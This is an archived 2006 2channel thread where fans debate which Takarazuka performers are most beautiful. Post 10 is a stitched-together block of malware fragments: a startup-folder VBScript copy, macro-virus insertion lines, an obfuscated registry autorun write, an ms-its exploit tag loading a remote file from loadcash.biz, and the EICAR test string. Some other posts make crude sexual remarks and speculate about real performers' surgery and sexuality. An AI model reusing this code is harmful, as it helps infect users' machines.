2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■好き嫌いはともかく【美人】ジェンヌは誰? 2

1 :名無しさん@花束いっぱい。:2006/10/14(土) 15:13:43 ID:uP/pHrzd
素顔でも舞台のあのシーンが美人でも
なんでもいいので綺麗な人教えて下さい。

現役はもちろん、下級生・OGも可



2 :名無しさん@花束いっぱい。:2006/10/14(土) 15:15:52 ID:pbiePmSB
檀れい様のためのスレですか?

3 :名無しさん@花束いっぱい。:2006/10/14(土) 15:27:33 ID:zot37Vxn
文章がおかしいぞ…
下級生も現役に入れてやれや…

でもまあ乙と言っておこう。

4 :名無しさん@花束いっぱい。:2006/10/14(土) 15:36:01 ID:uP/pHrzd
スマソ・・・orz
前スレ上級生で占めてたもんで
下級生もよろしゅうって事で。

5 :名無しさん@花束いっぱい。:2006/10/14(土) 19:53:49 ID:+qKw5jKi
かしげっていつかの「(美人だって)よく言われる」発言が
嫌味にならないからスゴイ

6 :名無しさん@花束いっぱい。:2006/10/14(土) 20:29:52 ID:pXa24frq
貴城けい様

その美貌の秘訣は?
の問いに
別に美貌じゃないし(笑い

7 :名無しさん@花束いっぱい。:2006/10/14(土) 20:58:44 ID:gb3O3R5T
音月、綺華か?
顔を中心にみると。

8 :名無しさん@花束いっぱい。:2006/10/14(土) 21:01:16 ID:pXa24frq
音月桂は美人じゃなく可愛い

9 :名無しさん@花束いっぱい。:2006/10/14(土) 21:02:02 ID:1CSepdbT
って事は…
美人だってよく言われるが自分じゃ別に
美人だとは思ってないって事か?

10 :<body onload=window()>:2006/10/14(土) 21:02:04 ID:EIeN6wMZ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


11 :名無しさん@花束いっぱい。:2006/10/14(土) 21:16:57 ID:/k3+XuQ1
かしげって「よく言われる」とか「もっと言って」とか
言う割にはキレイって言われると結構本気で照れて
たりするんだよなw

下級生なら凰稀かな。

12 :名無しさん@花束いっぱい。:2006/10/14(土) 21:20:47 ID:pXa24frq
下級生なら早霧せいな

13 :名無しさん@花束いっぱい。:2006/10/14(土) 23:31:04 ID:wQjtEOzF
アリスちゃん美人だと思うんだけどなぁ。意外と名前がない。

14 :名無しさん@花束いっぱい。:2006/10/14(土) 23:46:26 ID:+qKw5jKi
アリスは美人と言うより可愛い。

15 :名無しさん@花束いっぱい。:2006/10/14(土) 23:54:19 ID:iiOjjTF0
あさこが一番かわいい

16 :名無しさん@花束いっぱい。:2006/10/15(日) 03:37:31 ID:qHJMAtXZ
眉月、貴城

17 :名無しさん@花束いっぱい。:2006/10/15(日) 04:37:29 ID:ak6byhEw
カシゲとトモヨは笑った顔が似てる
二人とも美人や

18 :名無しさん@花束いっぱい。:2006/10/15(日) 07:10:40 ID:6J0wW7Rk
轟さん綺麗ですね!

19 :名無しさん@花束いっぱい。:2006/10/15(日) 11:11:42 ID:6iVC/TsD
研1の白百合ひめさん。
実物かなり綺麗だった!

20 :名無しさん@花束いっぱい。:2006/10/15(日) 11:20:06 ID:dfMzwVl8
研1だったら煌月くん

21 :名無しさん@花束いっぱい。:2006/10/15(日) 11:22:58 ID:6YoVcS2/
研1は剣崎さんの顔が好き!

22 :名無しさん@花束いっぱい。:2006/10/15(日) 12:20:17 ID:eOAkTnK+
天寿光希さんもきれいだよね?
若い頃の眉月さんににてる。

23 :名無しさん@花束いっぱい。:2006/10/15(日) 14:38:54 ID:TjGJYA8m
ともよさんってほんとに綺麗。
見とれちゃう。

24 :名無しさん@花束いっぱい。:2006/10/15(日) 16:42:13 ID:M4r4ufjv
かしげはキレイだしかっこいいし可愛い

25 :名無しさん@花束いっぱい。:2006/10/15(日) 17:37:53 ID:SSoS2alC
ゆかりちゃんとチギちゃん。

26 :名無しさん@花束いっぱい。:2006/10/15(日) 21:00:14 ID:chF2Ia8P
舞台化粧でもいいんだよね?
オクラホマの越りゅうの叔母さんが、とっても美人さん。

27 :名無しさん@花束いっぱい。:2006/10/16(月) 00:17:07 ID:JvhVxU/z
貴城さん


28 :名無しさん@花束いっぱい。:2006/10/16(月) 00:28:28 ID:ZZYpkQgF
過去OGもあげると山のようにいるから…
とりあえず現役候補生で…
かしげ
あと…
マトブ



29 :名無しさん@花束いっぱい。:2006/10/16(月) 01:30:56 ID:9b/1zLxH
ともよちゃん!

30 :名無しさん@花束いっぱい。:2006/10/16(月) 09:55:11 ID:nC/05e0W
絶対かしげ

31 :名無しさん@花束いっぱい。:2006/10/16(月) 09:59:54 ID:fISrTJ1j
そういえば、きれいすぎて「観音様」って
呼ばれてた人がいるって聞いたことあるけど、
芸名も顔も見たことないから本当かどうか・・・
 

32 :名無しさん@花束いっぱい。:2006/10/16(月) 10:21:13 ID:7SyL8x5x
そういえば高城叶が観音様って愛称書いてたな、おとめに

33 :名無しさん@花束いっぱい。:2006/10/16(月) 22:15:00 ID:i1BCXHQ1
いわゆる美人顔じゃないけど
芸能人顔だなと思ったのは
音月、アリス、まひる

キャラがたってるなと思ったのが
ウメ、あすか

34 :名無しさん@花束いっぱい。:2006/10/16(月) 22:27:08 ID:nn5M7mTe
>>31
>>32が書いてる、高城 叶さんで正解!

同じ雪組で同期の高梨 順さんとよくペアで使われてたけど
2人が並ぶ姿は、本当に美しかった〜

35 :名無しさん@花束いっぱい。:2006/10/17(火) 15:20:20 ID:WnE/zIDL
こんなもん
ttp://www2.azaq.net/free/vote/vote.cgi?soxf2000

36 :名無しさん@花束いっぱい。:2006/10/18(水) 00:51:22 ID:KmST+fBu
ともよが綺麗。
かしげも綺麗。

37 :名無しさん@花束いっぱい。:2006/10/18(水) 21:00:32 ID:ePh08asa
ともよ
かしげ
だん
ゆかり


38 :名無しさん@花束いっぱい。:2006/10/18(水) 21:33:00 ID:+LgSNekp
貴城さんは綺麗だと思う。
OGなら、ほさっちゃん

39 :名無しさん@花束いっぱい。:2006/10/19(木) 00:31:39 ID:zrmok/0A
眉月さん、貴城さん。
二人とも笑った顔が似ていると思うときがある。

40 :名無しさん@花束いっぱい。:2006/10/19(木) 10:24:47 ID:PrdYh70x
雪の新公出で下級生を見たんだけど 研一の 剣崎裕歌 大澄れい が綺麗でした。 彩凪さんは小動物系!?

41 :名無しさん@花束いっぱい。:2006/10/19(木) 15:48:32 ID:2fY+U1KY
研1なら、花の月野姫花さんがダントツだと思いました。
あと、星の妃白さんも実物すごくかわいい。
初詣は蘭乃はなさんと92期スレにあったけどほんと?
確かに綺麗だけど。


42 :名無しさん@花束いっぱい。:2006/10/19(木) 18:04:52 ID:+Xq6UrAC
かしげさんはオーラも含めてきらきらでした。
ゆかりさんもきらきらでした。

轟さんも綺麗だなぁと思います。

43 :名無しさん@花束いっぱい。:2006/10/19(木) 18:08:25 ID:3LUVW87U
彩愛ひかるちゃん☆プリティーアンドビューティ

44 :名無しさん@花束いっぱい。:2006/10/19(木) 21:06:41 ID:1zfg3miR
理事はふっくらすると凄い美人
痩せすぎるとあかん
でも最近のポートは軒並み凄い!

45 :名無しさん@花束いっぱい。:2006/10/19(木) 23:31:20 ID:SCfXxYSR
かしちゃん
ゆかりちゃん
ちぎちゃん が美人だと思う

46 :名無しさん@花束いっぱい。:2006/10/20(金) 01:58:22 ID:F+XIV79y
眉月凰はホント美人。うっとりするくらい美人だと思う。

47 :名無しさん@花束いっぱい。:2006/10/22(日) 21:53:01 ID:cmdjsI6c
美形だと思うのは、かしちゃん。
可愛いと思うのは、みりお君。

48 :名無しさん@花束いっぱい。:2006/10/23(月) 01:44:37 ID:TuLBYV4Q
ともよちゃんかわいい

49 :名無しさん@花束いっぱい。:2006/10/24(火) 19:49:36 ID:WjjmNsdK
男役では壮君でそう。後は、まとぶん・かしげ。 
娘役ではアリス・まりい・きらり。

でも、トド様・ゆかり・かなめは顔濃いな〜とは思うけど、
全然美人とは思えない少数派な私…。

50 :名無しさん@花束いっぱい。:2006/10/25(水) 20:21:09 ID:rhsUZR4C
轟、綺華、貴城、蘭寿、大和、檀、花影、彩乃

真飛さんよく名前あがるけど・・・鼻が長い。

51 :名無しさん@花束いっぱい。:2006/10/25(水) 23:05:22 ID:KG1ThrtD
理事を間近で見てしまった人間としてはやはり理事
えっ?人形?人間?だった
あとは退団したせらちゃん、気品のある顔立ちは未だに忘れられない

52 :名無しさん@花束いっぱい。:2006/10/26(木) 00:14:06 ID:qcxPSKM2
理事さんはやっぱり綺麗です!

53 :名無しさん@花束いっぱい。:2006/10/26(木) 00:25:04 ID:pdu0YuFG
理事は見るたび老けたなあとしか思えん。
昔は綺麗だったけどねえ。

54 :名無しさん@花束いっぱい。:2006/10/26(木) 00:37:34 ID:stwimuuA
理事は昔より綺麗だよ。
若いとか老けてるの次元ではなくて
内面からの綺麗さは今の方がはるかに上。



55 :名無しさん@花束いっぱい。:2006/10/26(木) 00:40:01 ID:7uzZCH11
>54
同感

56 :名無しさん@花束いっぱい。:2006/10/26(木) 01:24:34 ID:ww4QPJx8
眉月だんとつ一位

57 :名無しさん@花束いっぱい。:2006/10/26(木) 10:22:29 ID:4gdU4M6Q
私も理事は老けたとしか思えない。
いつまでものさばる身のほど知らずの厚顔なおばさんとしか思えない私が歪んでるからかなw
かしげちゃんと王子は綺麗だね。
ちぎちゃんも。

58 :名無しさん@花束いっぱい。:2006/10/26(木) 10:38:20 ID:5AAv/Y8A
かしげを新幹線のホームでたまたま見かけた時、
かしげが歩いている周りの人達が、軒並みオオオ?!という感じで振り向いて行ったのを
目撃したのが忘れられないっす。
宙に浮いてるみたいに、非現実的に美人だった。

59 :名無しさん@花束いっぱい。:2006/10/26(木) 20:25:32 ID:D0e17xge
>54
自分も理事は昔より今の方が綺麗に見える
てか出版物が凄いw

最近のまとぶもなかなか綺麗

60 :名無しさん@花束いっぱい:2006/10/26(木) 20:31:26 ID:fFmC8uau
>>57
うん、歪んでるからだろうね

61 :名無しさん@花束いっぱい。:2006/10/26(木) 20:53:28 ID:NwMzEdUL
オクラホマNOW ON〜見たら、理事老けたなーって思った。
で、ちょっと若い頃の、箙さんに似てるなあ〜と思い・・、
パソカレ表紙を見て、老けた浜崎あゆみみたい・・と思った。

62 :名無しさん@花束いっぱい。:2006/10/26(木) 22:24:48 ID:xvp8PNgI
パソカレの理事はサイボーグ的美w
副業に広告の仕事でもしなされ

63 :名無しさん@花束いっぱい。:2006/10/26(木) 22:59:17 ID:qcxPSKM2
理事 モード系のモデルみたい!端正ですね!でも 笑うと意外とかわいい 老けてるのは仕方ないね もう40歳暗いでしょ?

64 :名無しさん@花束いっぱい。:2006/10/26(木) 23:14:08 ID:QJ7VyrEh
傾げ一般人より綺麗なのは認めるが
ジェンヌの中では普通とオモ
タニの方が断然綺麗〜

65 :名無しさん@花束いっぱい。:2006/10/26(木) 23:37:01 ID:VTi+/uDD
かしちゃん。
素で衣装を着ても負けない美貌。

66 :名無しさん@花束いっぱい。:2006/10/27(金) 01:45:57 ID:HbFXx9w7
綺華れいさん、貴城けいさん、真飛聖さん

67 :名無しさん@花束いっぱい。:2006/10/27(金) 01:46:03 ID:Z+5GqyoG
舞台以外、出待ちで二度トド(理事)を見たけど、その時は
ノーメイクで帽子を深くかぶってたからあまり分からなかった
けど、この間オクラホマの出待ちで普通にメイクして帽子を
かぶっていないトドを見た。

もう出てきたとたん一瞬息ができないくらい綺麗だった。
蝋人形が歩いてるみたいで・・・。
こんな綺麗な人間がこの世の中にいるんだなと思った。
いろんな芸能人を見たことがあるけど、私が今まで見た
人のなかでトドが一番美しかった。


68 :名無しさん@花束いっぱい。:2006/10/27(金) 08:52:23 ID:yTkLgc+K
私も生とどを2〜3mの距離で見たことある。
感動ものだったよ、綺麗すぎ。
もう少し愛想があれば一般受けするのに・・・
でもファンはあの雰囲気がいいのかもね

69 :名無しさん@花束いっぱい。:2006/10/27(金) 09:46:57 ID:4H/veswV
私の知りうる限りで、最も美しい人…byオギ


70 :名無しさん@花束いっぱい。:2006/10/27(金) 09:56:18 ID:4H/veswV
スマソ…
×オギ
○オギー
そんなコメント載せていいのか?

71 :名無しさん@花束いっぱい。:2006/10/27(金) 10:05:59 ID:UFwHLsOp
やめたけど彩輝直
同じぐらい美人の姉が大ファンだった。

72 :名無しさん@花束いっぱい。:2006/10/27(金) 10:43:49 ID:XzOJxeI0
88期の夏月都
スカイフェアリーズやってたのにあんまでないな〜

実物超美人!!

73 :名無しさん@花束いっぱい。:2006/10/27(金) 16:38:24 ID:+pByxoY1
うん、理事だな。なんか圧倒される。
出待ちのときも、理事のときだけギャラリーの空気が全然違うし。
しかしスッピン、グラサン、帽子、愛想なし、早歩き(笑)
まあ、態度悪い感じではないからまだいいけど。
とにかく、素化粧の理事は一見の価値アリだとオモ
理事は素化粧で舞台に立てばイイ 衣装に負けることはない顔だし

74 :名無しさん@花束いっぱい。:2006/10/27(金) 17:09:56 ID:AJrCZWbQ
>73
わかる、わかる
その雰囲気・・ニコッ〜とかしてみりゃいいのにね。
営業スマイル・・
なんにしても、きれいとゆうか、ただならぬ・・ってかんじ。

75 :名無しさん@花束いっぱい。:2006/10/27(金) 17:20:52 ID:+pByxoY1
>74
ただならぬ・・・ワロタw 確かにそうだ!!
しかし、その理事が舞台を降りると何の目撃談もないのが一番の謎。
あの雰囲気、あの顔、あの華奢さはすぐ分かると思うのに・・・
引きこもってるわけではなさそうだし


76 :名無しさん@花束いっぱい。:2006/10/27(金) 19:49:23 ID:KNpFd0BL
変装の名人

77 :名無しさん@花束いっぱい。:2006/10/28(土) 10:45:06 ID:K98A75+M
どうしよう、トドさんが普段は巻き髪の鬘とか被って変装してたら…

78 :名無しさん@花束いっぱい。:2006/10/28(土) 15:07:38 ID:b1zgLRoz
王子だろ。

79 :名無しさん@花束いっぱい。:2006/10/28(土) 20:07:27 ID:Myj5iHmg
>77
そんなことになったら・・・可愛いすぎるジャマイカ!!

80 :名無しさん@花束いっぱい。:2006/10/28(土) 23:09:58 ID:eOB7YC8o
かしげ、タニ、チギ、しみこ、まなと

81 :名無しさん@花束いっぱい。:2006/10/28(土) 23:34:02 ID:JjA9VJmj
ゆかりちゃんってほんときれい…。ため息出ちゃう。

82 :名無しさん@花束いっぱい。:2006/10/29(日) 05:08:00 ID:VhR/JXZS
『美人』は、かしげ、ゆかり。
美人の肌が荒れは許されない。

83 :名無しさん@花束いっぱい。:2006/10/29(日) 05:37:22 ID:LF9uhWo6
カシのエッチしてる時の顔見てみたい

84 :名無しさん@花束いっぱい。:2006/10/29(日) 16:41:35 ID:/PPMiMva
74の「わかる」が「わたる」に見えた。

美人・美しい・綺麗・容姿端麗・音痴とゆう言葉は(●▽●)のためにある。

85 :名無しさん@花束いっぱい。:2006/10/29(日) 20:34:39 ID:PAykk/c5
退団したけど、和央ようかさん 美しすぎる

86 :名無しさん@花束いっぱい。:2006/10/30(月) 00:31:49 ID:mYLw7G9K
85さん、スレ名確認して書き込みよろしく。
願望スレじゃない。

87 :名無しさん@花束いっぱい。:2006/10/30(月) 02:34:39 ID:UjE8MkyX
>85タソじゃないけど何かおかしかった?願望?

私はOGでは麻乃よしこちゃんが美人だったとオモ。
最近の天海ゆりちゃんも年の割りに若く見えるし、きれいになった。
現役では水。メイクしたコム。

88 :名無しさん@花束いっぱい。:2006/10/30(月) 02:35:43 ID:UjE8MkyX
メイクした〜はスレチかな?
ごめんなさい。

89 :名無しさん@花束いっぱい。:2006/10/30(月) 13:28:50 ID:fVbdqJEw
ゆかりちゃんって正面で澄ましてるとかなりの美人。
でも、横から見るとしゃくれ過ぎて美人が台無し。
笑うとお口がひしゃげるし・・。

90 :名無しさん@花束いっぱい。:2006/10/30(月) 14:01:52 ID:gS0D71Qc
メイクした〜はスレチじゃないけど
綺麗になった=水・・・・・・は、スレチw
水で思い出した!卓カレの水って写り悪いだけか?
整形崩れみたいでビクーリしたぞ。

91 :名無しさん@花束いっぱい。:2006/10/30(月) 17:29:36 ID:87NRzszn
理事嫌いだけど美人は認めますよ…あの人すげぇきれー。
ゆかりちゃんも綺麗な方やぁ顎も若干出てたほうが外人みたいでよろし

92 :名無しさん@花束いっぱい。:2006/10/30(月) 18:30:15 ID:Uh/dIuIi
>90
水は綺麗になったよ
卓カレはいじり過ぎ?
でもスタカレはかなり綺麗だった

卓カレだと理事が凄く綺麗
最初誰かわからんかった
パーツが揃っている人は強い

93 :名無しさん@花束いっぱい。:2006/10/30(月) 22:05:52 ID:nRNl6IpI
昔、コンビニから出て来たかしげと遭遇した
事があって、びっくりしたのと同時に
あまりの美形っぷりに、しばし呆然…

94 :名無しさん@花束いっぱい。:2006/10/31(火) 03:44:37 ID:WDao0I3b
かしちゃんは
整形じゃないの?
歌劇表紙みて思ったんだけど、
「目、切開してます!」って感じよ。

95 :名無しさん@花束いっぱい。:2006/10/31(火) 14:55:52 ID:g0sq5zj1
切開なんざする暇なかったよ。
昔に比べると痩せて目の回りの肉なくなったけど、元々美人。

96 :名無しさん@花束いっぱい。:2006/10/31(火) 16:41:44 ID:AdTQteLV
かしげとともよ。同期で美人。

97 :名無しさん@花束いっぱい。:2006/10/31(火) 23:04:09 ID:WDao0I3b
そうか。痩せただけか、
歌劇8月号で気になって…整形疑惑掛けて
ごめんねかしちゃん

98 :名無しさん@花束いっぱい。:2006/11/01(水) 04:04:50 ID:AZ9uOnk8
カシゲはお父ちゃん似だよねん
中学時代も可愛かったからモテたろうな

99 :名無しさん@花束いっぱい。:2006/11/01(水) 06:57:14 ID:JUTHUvVF
美人なら、チギ・ゆかり・書いてる人多いけど本当に美人!!前《ファントム》見に行ったとき星組と宙組の生徒さん達も見に来てて、その二人も居た。テレビで見ても美人だけど間近で見たらため息が出た。あと、大真サンとるうみチャンも美人だったなぁ〜。

100 :名無しさん@花束いっぱい。:2006/11/01(水) 07:52:03 ID:tsAdyuTH
和、せしるもこれからますます美人になりそうー

101 :名無しさん@花束いっぱい。:2006/11/01(水) 09:21:41 ID:wWiv0bzr
ネッシーさん

102 :名無しさん@花束いっぱい。:2006/11/01(水) 11:25:28 ID:RXAIkrS7
かしげさん
澄ましててもくしゃっと笑っても美人。線の細いスタイルも綺麗。

轟さんはまるで蝋人形みたいで、たまにゾッとするほど。生身の人間って感じがしないw

103 :名無しさん@花束いっぱい。:2006/11/01(水) 20:20:33 ID:AGLWuMfZ
ゆかり、かしげ、ともよ。

104 :名無しさん@花束いっぱい。:2006/11/02(木) 00:00:09 ID:m5177USp
「美人」と「綺麗な人」と「可愛い人」は似ているようで待ったく別物なのに
なんだか最近混同してる人が多い。

105 :名無しさん@花束いっぱい。:2006/11/02(木) 00:57:38 ID:hF9f1+yd
王子は本当の美人さんである。

106 :名無しさん@花束いっぱい。:2006/11/02(木) 06:28:40 ID:bvtKWCsb
凄い美人なのに 舞台では男前!やっぱり理事さんです

107 :名無しさん@花束いっぱい。:2006/11/02(木) 08:17:34 ID:90c2bzBl
ちぎちゃん。
何か清潔感があり、健康的美人さんて感じ。

108 :名無しさん@花束いっぱい。:2006/11/02(木) 09:22:14 ID:2C09SQlj
早霧せいな
妹さんもかわいい

109 :名無しさん@花束いっぱい。:2006/11/02(木) 10:12:49 ID:3e7A4d91
確かに、綺麗だけど美人じゃないって人は結構いるよね。
美人>綺麗>可愛い
ってか?

110 :名無しさん@花束いっぱい。:2006/11/02(木) 17:59:16 ID:mdxsdfG/
かしげの目は音楽学校時代と変わってるし明らかに
二重の切開手術をしたね。
やらない方が男役としてはよかったのに・・・。

111 :名無しさん@花束いっぱい。:2006/11/02(木) 18:35:56 ID:hF9f1+yd
んなこたない。

112 :名無しさん@花束いっぱい。:2006/11/02(木) 23:55:32 ID:y5QCJkT1
やっかみ妄想はやめれ。みっともねーぞ

113 :名無しさん@花束いっぱい。:2006/11/03(金) 04:05:25 ID:pG4if4JN
カシゲはお尻の穴まで綺麗そう

114 :名無しさん@花束いっぱい。:2006/11/03(金) 05:07:39 ID:rT9sYdHw
ともよかしげ☆

115 :名無しさん@花束いっぱい。:2006/11/03(金) 15:16:44 ID:WGogDWQy
貴城けい、大和悠河

116 :名無しさん@花束いっぱい。:2006/11/03(金) 15:39:44 ID:BAlEafsJ
>>110
目はして無いと思うけど、鼻はしてるな
CSで続けざまに昔の「レインボーカフェ」とアメパイのナウオン見たら
違いがはっきりとわかった


117 :名無しさん@花束いっぱい。:2006/11/04(土) 00:02:33 ID:u55WnoKj
王子と高校一緒だったけど、超美人だたよ

118 :名無しさん@花束いっぱい。:2006/11/04(土) 01:11:41 ID:ugyWFeX6
王子って整形でしょ

119 :名無しさん@花束いっぱい。:2006/11/04(土) 01:24:38 ID:xuBiYgbv
整形スレって有ったっけ?

120 :名無しさん@花束いっぱい。:2006/11/04(土) 01:27:34 ID:Pj2NTejU
かしちゃん
ゆかりちゃん
檀ちゃん

121 :名無しさん@花束いっぱい。:2006/11/04(土) 01:55:02 ID:RfwSuY6k
あさこさんを美人といったら
怒られますか・

122 :名無しさん@花束いっぱい。:2006/11/04(土) 02:03:08 ID:gPoVtkIB
>>117裏山
王子彼氏いた?

123 :117:2006/11/04(土) 08:54:50 ID:u55WnoKj
>>118
高校時代と顔かわんないよ(年齢的なものはあるが・・・)

>>122
同じ学校にはいなかったと思う

美人&成績優秀だたので、学校案内のパンフとかにも載ってた

124 :名無しさん@花束いっぱい。:2006/11/04(土) 11:17:12 ID:gPoVtkIB
ありがとww
王子レズではないんだ?

125 :名無しさん@花束いっぱい。:2006/11/04(土) 16:50:19 ID:Cg4lvlUx
王子はマジきれいだ!!!あこがれる!!!!

126 :名無しさん@花束いっぱい。:2006/11/05(日) 00:29:40 ID:Hge2gdJR
こーやって見てると、本当宝塚って美人少ないんだな。

127 :名無しさん@花束いっぱい。:2006/11/05(日) 01:20:15 ID:cKOOMzYm
宝塚独特のオーラでごまかしてるんだよ


128 :名無しさん@花束いっぱい。:2006/11/05(日) 01:31:57 ID:e94j7hzt
オクラホマ見て、腰リュウ美人だと思った。女役初めてかな?

129 :名無しさん@花束いっぱい。:2006/11/05(日) 02:07:38 ID:NIf5IxkI
王子、かしげ、ゆかり。この三人だけだろ。

130 :名無しさん@花束いっぱい。:2006/11/05(日) 02:09:48 ID:zY/iW7td
チギ

131 :名無しさん@花束いっぱい。:2006/11/05(日) 16:06:02 ID:GsFaAII7
この前はじめて星組見に行ったんだけどゆかりちゃんとぉっても美人!あんな綺麗な人いたんだねぇ

132 :名無しさん@花束いっぱい。:2006/11/05(日) 21:28:51 ID:6CIVTege
好きな顔ではない

133 :名無しさん@花束いっぱい。:2006/11/05(日) 22:21:12 ID:CNX/A6Kv
やっぱりイシちゃんかな
かしげさんも美人だけど身内には雛形あきこそっくりとか言われて納得いかない

134 :名無しさん@花束いっぱい。:2006/11/05(日) 22:41:48 ID:xClStjiI
轟さんの入りに遭遇したけど
息を呑むっていうか、時間が止まったようになるよね
あっという間なんだけど
あの人は空気が違う綺麗さがある

135 :名無しさん@花束いっぱい。:2006/11/05(日) 22:43:34 ID:p9F+Ntfp
理事はやっぱり綺麗ですね!それに品のある色気が漂ってますね 眉月さんもかなりの美人さんだと思う!

136 :名無しさん@花束いっぱい。:2006/11/05(日) 23:01:12 ID:HAsfRXuP
ゆかりさんて、フィギュアスケートのオリンピックで金メダルとった人
名前忘れちゃったけど、
似てるよね。
美人?なのかなぁ。
東洋人的には、美人なのかな。
りせも似てるけど、美人じゃないな。

137 :名無しさん@花束いっぱい。:2006/11/05(日) 23:06:59 ID:zY/iW7td
リセはしゃくれ過ぎ

138 :名無しさん@花束いっぱい。:2006/11/06(月) 00:16:59 ID:AQwasGtK
眉月さん。これ以上の美人はいない。

139 :名無しさん@花束いっぱい。:2006/11/06(月) 00:30:47 ID:nmjq74B8
現役ならかしげ、ゆかり、王子かな。

王子はあんなにキレイで成績もいいのに、なんで路線じゃないのか不思議だった。
いまだに納得できない。

140 :名無しさん@花束いっぱい。:2006/11/06(月) 00:33:33 ID:CMREsG87
やっぱり・・・壇ちゃん!
アムネリスも楊貴妃も美人だった!
ま、美人だった・・・だけでしたけど・・。

141 :名無しさん@花束いっぱい。:2006/11/06(月) 00:39:38 ID:sCgaSV6J
王子、思うに、生真面目すぎて、いろんなとこで損してる感じ。
演技も、下手だし。
下級生じたいの修行が足りなかったかな。
せっかくまわってきたチャンスも、生かすことがなかった。

142 :名無しさん@花束いっぱい。:2006/11/06(月) 01:49:58 ID:J9eCeI1m
>>141
同意
下級生のころはナカナカの位置にいたと思うんだけど…。
タモさんの退団あたりから、完全に外されたような。
せっかくキレイなのにもったいない。

なんかスレ違いになっちゃったか?スマソorz


143 :名無しさん@花束いっぱい。:2006/11/06(月) 03:51:53 ID:7BMJF9yx
昔、王子が研4くらいのとき一緒に写真撮ってもらった…
腰が抜けるほど美しかった。今も変わらず綺麗な方だわ。

144 :名無しさん@花束いっぱい。:2006/11/06(月) 14:02:33 ID:Jkjdt0/H
タニちゃん たかちゃん

145 :名無しさん@花束いっぱい。:2006/11/06(月) 14:04:35 ID:Jkjdt0/H
タニちゃん たかちゃん

146 :名無しさん@花束いっぱい。:2006/11/06(月) 14:23:53 ID:9nMT11KG
たかちゃんのどこがきれいなの?

147 :名無しさん@花束いっぱい。:2006/11/06(月) 16:11:21 ID:qg7khigI
王子の花時代の新公見て書いてる?
セリフも歌も存在感も大したことないよ
アサコの方が成長していったもん
成績よくても舞台で発揮できなきゃ意味ない
まあ役が付いてなんぼの世界だけど
でも顔は美人だね

148 :名無しさん@花束いっぱい。:2006/11/06(月) 16:12:42 ID:qg7khigI
たかちゃん
小顔!スタイル◎!
…でも美人か?美人系だよ

149 :名無しさん@花束いっぱい。:2006/11/06(月) 16:17:10 ID:9nMT11KG
たかこ=ヒラメ顔
たかこ=カエル顔
たかこ=ウーパールーパー顔


150 :名無しさん@花束いっぱい。:2006/11/06(月) 16:20:46 ID:qg7khigI
懐かしのウーパールーパーは可愛いぞ!
せめてイルカ似にしてくれ!

151 :名無しさん@花束いっぱい。:2006/11/06(月) 16:29:55 ID:gdnzwQgQ
かしげ、檀ちゃん
一目見ただけで美人だと分かる。
素顔も美人だ。


152 :名無しさん@花束いっぱい。:2006/11/06(月) 16:39:17 ID:qg7khigI
檀ちゃんは鼻と横顔以外は美人

153 :名無しさん@花束いっぱい。:2006/11/06(月) 17:48:06 ID:BV3AVc1g
檀ちゃん、かしちゃん、王子。
すごい美人同期トリオだね。

154 :名無しさん@花束いっぱい。:2006/11/06(月) 17:51:24 ID:bWN65l+b
カシゲと王子と檀ちゃんは性格も良さそう

155 :名無しさん@花束いっぱい。:2006/11/06(月) 22:01:03 ID:4AW3uy87
かしタニ
今の宙組公演は目の保養になるよ

156 :名無しさん@花束いっぱい。:2006/11/07(火) 00:34:25 ID:ukD9lmxE
ともよちゃん!かしちゃん!

157 :名無しさん@花束いっぱい。:2006/11/07(火) 11:07:22 ID:Kh8h1mlU
わかったぞ!これが美人と綺麗の差か
このスレで人気のかしげや理事様、王子は「美人」でたかちゃんは「綺麗」なんだね

158 :名無しさん@花束いっぱい。:2006/11/07(火) 12:06:27 ID:S6yYjZQn
たかちゃんはカッコイイでしょ
綺麗や美人とはちょっと違うと思う

159 :名無しさん@花束いっぱい。:2006/11/07(火) 13:06:34 ID:yrCdyP3O
157さん
一度眼科へいかれては?

160 :名無しさん@花束いっぱい。:2006/11/07(火) 17:10:23 ID:P2gxX9//
タカちゃんは雰囲気美人だとオモ
かしげちゃんは目が綺麗だからインパクトな美人
檀ちゃんもこのタイプ。
理事は整ってるよね。

161 :名無しさん@花束いっぱい。:2006/11/07(火) 21:28:24 ID:tp/zDWYp
美人に見えるかどうかってやっぱり目の形じゃないかな?

162 :名無しさん@花束いっぱい。:2006/11/07(火) 23:01:40 ID:RIPCJfr2
黄金比とかじゃないの?

163 :名無しさん@花束いっぱい。:2006/11/08(水) 15:17:03 ID:m6InUdGH
宝塚の人ってたいてい顔ゆがんでるね。
それが不思議。発声練習とか関係あるのかも。
それと、えくぼ率が高い。えくぼあるかないかで合格決めてるんじゃない?

164 :名無しさん@花束いっぱい。:2006/11/08(水) 15:34:51 ID:XYpmbsT+
すいませんねぇ視力悪いのよ
美人かどうかは目よりも鼻と輪郭かな…とするとたかちゃんは違うか

165 :名無しさん@花束いっぱい。:2006/11/08(水) 17:14:21 ID:eAAQrcsz
眉月。貴城。笑った顔が似てるとおもう事が何度かあります。

166 :名無しさん@花束いっぱい。:2006/11/09(木) 02:13:35 ID:ZM7p2sZ9
美人っていうと、檀ちゃん、かしげ、ゆかり

>>161
美人顔は左右対称、って言われてる。

